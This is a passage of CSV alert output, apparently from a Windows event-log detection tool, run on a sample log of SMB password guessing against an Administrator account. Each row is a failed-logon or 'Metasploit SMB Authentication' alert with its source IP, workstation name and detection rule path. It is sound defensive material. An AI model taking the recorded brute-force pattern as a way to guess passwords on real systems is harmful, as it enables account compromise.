Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aTzlqq9HLEX6wzdU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gz98aGXd0fdVzmTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.785 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q2zOy64cp6dXelNl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.812 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X1BflxNjQRNopjb4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.858 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 401ulFeuzCtp5lPF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.914 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p0SIzJrzkseFB1j8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cyQMxtEdbud8iJLI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7gbjIqxD4E6fYsGx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rEeZEcj63sBddCsK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tiATfqYtrH9LoqR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PG3HB3GqFwQFLdcq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.169 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G8NU6WRdrq9DxM6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.216 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cvZKIkI2aeBzbwe0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.258 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EE7AL3nJ7qsnk4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.331 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feu34D0VvoMrnWzo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.331 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mrNRIpCpmAV3npax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zpxgEvvoC0stFdTl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XvpDKRAPDS36sqNL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.445 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4cqJKEIySxiQdCRD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.496 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pm1F7QEwBE054ui0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.535 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RvIjhyfdlXiX72Es : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dJilW4KgIEeh5VNr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.622 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Ka0FYYdVOj90l0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.715 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B9ZjGE8T6RuGx8SZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.715 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkti4BGVrpoAQRBL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.758 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fZy2YJPOg1YZ2bd0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rUE6E9H9i0l0P7Jp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Pkpt2nmRorQ3x0o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCZNNzSyi4mLLaxZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.937 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O9ZqF43sDjSirvMK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.986 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XOw9DjHISDX57XUe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rmxFpEQeGsgbXpDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MfIVCOOWQS7TNKQA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uweLaLhvznDee1IF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.172 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oNQcS2BonF12ikiX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.221 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.265 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D43Flf2keSL3aph6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.265 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.307 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zw7nJXNHZ2QNa3In : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.307 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UZp4567BIWAwxF9r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S9iVvPuykq62pV9z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eRVomETC34InuKPk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.431 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VpHfjKgAxChSYz8R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tIbTy5IDRy90lbUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mM6Olq0zYkMlwmrb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.565 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mUehtGEh0EqRHiLP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhZ2KHmCTonGrXSS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NZea5qiet7vrT3iv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aNWY8kuJMSy8h0Zk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.741 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 